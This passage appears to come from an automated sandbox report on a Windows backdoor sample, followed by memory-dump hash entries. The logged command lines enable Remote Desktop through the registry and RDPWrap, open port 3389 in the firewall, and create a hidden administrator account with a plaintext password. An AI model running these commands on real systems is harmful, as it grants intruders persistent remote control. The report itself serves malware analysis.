                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:3
                                                                                                                                                      Start time:17:07:04
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                      File size:59'392 bytes
                                                                                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:4
                                                                                                                                                      Start time:17:07:05
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:5
                                                                                                                                                      Start time:17:07:05
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:6
                                                                                                                                                      Start time:17:07:05
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
                                                                                                                                                      Imagebase:0x990000
                                                                                                                                                      File size:59'392 bytes
                                                                                                                                                      MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:7
                                                                                                                                                      Start time:17:07:05
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:8
                                                                                                                                                      Start time:17:07:05
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:9
                                                                                                                                                      Start time:17:07:05
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\RDPWInst.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                      File size:1'785'344 bytes
                                                                                                                                                      MD5 hash:C213162C86BB943BCDF91B3DF381D2F6
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                      Yara matches:
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.1765768816.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000002.1796146240.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000009.00000002.1796287017.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: 00000009.00000000.1765908730.0000000000450000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_RDPWrapTool, Description: Yara detected RDPWrap Tool, Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                                                                      • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, Author: Joe Security
                                                                                                                                                      Antivirus matches:
                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                      • Detection: 68%, ReversingLabs
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:10
                                                                                                                                                      Start time:17:07:05
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -s TermService
                                                                                                                                                      Imagebase:0x7ff6eef20000
                                                                                                                                                      File size:55'320 bytes
                                                                                                                                                      MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:high
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:12
                                                                                                                                                      Start time:17:07:07
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\netsh.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                                                                                      Imagebase:0x7ff6e3b40000
                                                                                                                                                      File size:96'768 bytes
                                                                                                                                                      MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:13
                                                                                                                                                      Start time:17:07:07
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\drivers\rdpvideominiport.sys
                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                      Commandline:
                                                                                                                                                      Imagebase:
                                                                                                                                                      File size:32'600 bytes
                                                                                                                                                      MD5 hash:77FF15B9237D62A5CBC6C80E5B20A492
                                                                                                                                                      Has elevated privileges:
                                                                                                                                                      Has administrator privileges:
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Reputation:moderate
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:14
                                                                                                                                                      Start time:17:07:08
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                      Commandline:
                                                                                                                                                      Imagebase:
                                                                                                                                                      File size:169'984 bytes
                                                                                                                                                      MD5 hash:64991B36F0BD38026F7589572C98E3D6
                                                                                                                                                      Has elevated privileges:
                                                                                                                                                      Has administrator privileges:
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:18
                                                                                                                                                      Start time:17:07:08
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\drivers\tsusbhub.sys
                                                                                                                                                      Wow64 process (32bit):
                                                                                                                                                      Commandline:
                                                                                                                                                      Imagebase:
                                                                                                                                                      File size:137'728 bytes
                                                                                                                                                      MD5 hash:CC6D4A26254EB72C93AC848ECFCFB4AF
                                                                                                                                                      Has elevated privileges:
                                                                                                                                                      Has administrator privileges:
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:false

                                                                                                                                                      Target ID:22
                                                                                                                                                      Start time:17:07:38
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /c net user JustonThompson G2ywh4BZ30yu /add
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:23
                                                                                                                                                      Start time:17:07:38
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:24
                                                                                                                                                      Start time:17:07:38
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:net user JustonThompson G2ywh4BZ30yu /add
                                                                                                                                                      Imagebase:0x760000
                                                                                                                                                      File size:47'104 bytes
                                                                                                                                                      MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:25
                                                                                                                                                      Start time:17:07:38
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\net1 user JustonThompson G2ywh4BZ30yu /add
                                                                                                                                                      Imagebase:0xea0000
                                                                                                                                                      File size:139'776 bytes
                                                                                                                                                      MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:26
                                                                                                                                                      Start time:17:07:38
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /c net localgroup
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:27
                                                                                                                                                      Start time:17:07:38
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:28
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:net localgroup
                                                                                                                                                      Imagebase:0x760000
                                                                                                                                                      File size:47'104 bytes
                                                                                                                                                      MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:29
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\net1 localgroup
                                                                                                                                                      Imagebase:0xea0000
                                                                                                                                                      File size:139'776 bytes
                                                                                                                                                      MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:30
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /c net localgroup "Remote Desktop Users" JustonThompson /add
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:31
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:32
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:net localgroup "Remote Desktop Users" JustonThompson /add
                                                                                                                                                      Imagebase:0x760000
                                                                                                                                                      File size:47'104 bytes
                                                                                                                                                      MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:33
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\net1 localgroup "Remote Desktop Users" JustonThompson /add
                                                                                                                                                      Imagebase:0xea0000
                                                                                                                                                      File size:139'776 bytes
                                                                                                                                                      MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:34
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:35
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:36
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                                                                                                                                                      Imagebase:0x1560000
                                                                                                                                                      File size:82'432 bytes
                                                                                                                                                      MD5 hash:4E89A1A088BE715D6C946E55AB07C7DF
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:37
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:"cmd.exe" /c net localgroup "Administrators" JustonThompson /add
                                                                                                                                                      Imagebase:0x240000
                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:38
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                      Imagebase:0x7ff7699e0000
                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:39
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\net.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:net localgroup "Administrators" JustonThompson /add
                                                                                                                                                      Imagebase:0x760000
                                                                                                                                                      File size:47'104 bytes
                                                                                                                                                      MD5 hash:31890A7DE89936F922D44D677F681A7F
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Target ID:40
                                                                                                                                                      Start time:17:07:39
                                                                                                                                                      Start date:11/10/2024
                                                                                                                                                      Path:C:\Windows\SysWOW64\net1.exe
                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                      Commandline:C:\Windows\system32\net1 localgroup "Administrators" JustonThompson /add
                                                                                                                                                      Imagebase:0xea0000
                                                                                                                                                      File size:139'776 bytes
                                                                                                                                                      MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                      Has exited:true

                                                                                                                                                      Reset < >
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2171506223.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_26c0000_67065b4c84713_Javiles.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: (bq$(bq$Hbq
                                                                                                                                                        • API String ID: 0-2835675688
                                                                                                                                                        • Opcode ID: 1e4bfffba658b0a721d80f80acbf0fccc8312ccb4ac46a86ae69050d68f3e616
                                                                                                                                                        • Instruction ID: 04c51fc7de30042049cbe2bb71a2349eace294f1fdf1f6d85ae637304b118b32
                                                                                                                                                        • Opcode Fuzzy Hash: 1e4bfffba658b0a721d80f80acbf0fccc8312ccb4ac46a86ae69050d68f3e616
                                                                                                                                                        • Instruction Fuzzy Hash: 5441F2353082808FC715EB79A85452EBFA3EFC521131886BED41ACB396DE309D0AC795
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2171506223.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_26c0000_67065b4c84713_Javiles.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: E>p$E>p
                                                                                                                                                        • API String ID: 0-3761653739
                                                                                                                                                        • Opcode ID: 7bea3f021b2d63ab6d91bd04d3eeb87814a906cdd5851d9b312b01d77a3c2e0a
                                                                                                                                                        • Instruction ID: 0a472ad0dc840502822cb82aa577ba3554b8d91488d442bc5e107599477ac4c6
                                                                                                                                                        • Opcode Fuzzy Hash: 7bea3f021b2d63ab6d91bd04d3eeb87814a906cdd5851d9b312b01d77a3c2e0a
                                                                                                                                                        • Instruction Fuzzy Hash: F4614171B406468FCB01EFAED5915AEBBE6EFC8310B10866AE405DB359DF70EC458B90
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2171506223.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_26c0000_67065b4c84713_Javiles.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: '
                                                                                                                                                        • API String ID: 0-3744524632
                                                                                                                                                        • Opcode ID: 9fe8dc08488d5d72472229500d18501bfc3f95be659c3b66fa32b6156611335a
                                                                                                                                                        • Instruction ID: 51a10475544f6e2f5451333c17aad1efa8aef725cb1db4c29980c2504e5df7d8
                                                                                                                                                        • Opcode Fuzzy Hash: 9fe8dc08488d5d72472229500d18501bfc3f95be659c3b66fa32b6156611335a
                                                                                                                                                        • Instruction Fuzzy Hash: 5FF1A130B012459FCB06EFA9D5946ADBBF6FF89310F2485A9D406EB365DB30AD09CB50
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2171506223.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_26c0000_67065b4c84713_Javiles.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: Te^q
                                                                                                                                                        • API String ID: 0-671973202
                                                                                                                                                        • Opcode ID: e2642eddb82d74bdd3c1212368bfd28dc950595daec40d0f48647e916f0ab3c6
                                                                                                                                                        • Instruction ID: 583ae7cf372f457319cef576037da1408b0c36c8978e77d9f7175f4146d5cf56
                                                                                                                                                        • Opcode Fuzzy Hash: e2642eddb82d74bdd3c1212368bfd28dc950595daec40d0f48647e916f0ab3c6
                                                                                                                                                        • Instruction Fuzzy Hash: 7AC19A30B006058FC709EF38C494A6DBBF2FF89710B2585A9E40A9B7A5DF71AD15CB81
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2171506223.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_26c0000_67065b4c84713_Javiles.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: bq
                                                                                                                                                        • API String ID: 0-3837038491
                                                                                                                                                        • Opcode ID: 9617d1b21c97dbbe98b9d1cfecc4375c912b3a40f62c1d482c29d5ec3b2bef03
                                                                                                                                                        • Instruction ID: ee9176ae13947b13a6cc64e488bf770b2a2768a46c5018b4b5044b7b60281fc2
                                                                                                                                                        • Opcode Fuzzy Hash: 9617d1b21c97dbbe98b9d1cfecc4375c912b3a40f62c1d482c29d5ec3b2bef03
                                                                                                                                                        • Instruction Fuzzy Hash: 1FC16135A052488FCB15EF68D944AADBBF2FF8A310F198199D446EB365DB30AC45CF60
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2171506223.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_26c0000_67065b4c84713_Javiles.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: (bq
                                                                                                                                                        • API String ID: 0-149360118
                                                                                                                                                        • Opcode ID: 3edf8bb652173bb322aa901e7fbb4754948b8123dcd015de3a751fb1d6d73e4c
                                                                                                                                                        • Instruction ID: 57f8749b57fe39b4956085044f9be20f9ad30caac5324642a8868d441a5e6dc0
                                                                                                                                                        • Opcode Fuzzy Hash: 3edf8bb652173bb322aa901e7fbb4754948b8123dcd015de3a751fb1d6d73e4c
                                                                                                                                                        • Instruction Fuzzy Hash: 2171BE31B002414FDB19AB79C45076EB7E6EFC5700F28856EE4469B395DE34EC06CB91
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.2171506223.00000000026C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026C0000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_26c0000_67065b4c84713_Javiles.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: P?cq
                                                                                                                                                        • API String ID: 0-2896956381
                                                                                                                                                        • Opcode ID: aeaa9484d6d499bd3e37d9bb38933332594a8a8f143e22680a6600d5690a32b2
                                                                                                                                                        • Instruction ID: a01c810ca20138cc8e84aa53a5867a1b0d7adc28666cadf93aea6ec8ea3bf5c6
                                                                                                                                                        • Opcode Fuzzy Hash: aeaa9484d6d499bd3e37d9bb38933332594a8a8f143e22680a6600d5690a32b2
                                                                                                                                                        • Instruction Fuzzy Hash: A631D330A017049FCB25EF69C58059EFBF5EF88310B24866DE45AAB365DB31ED44CBA0
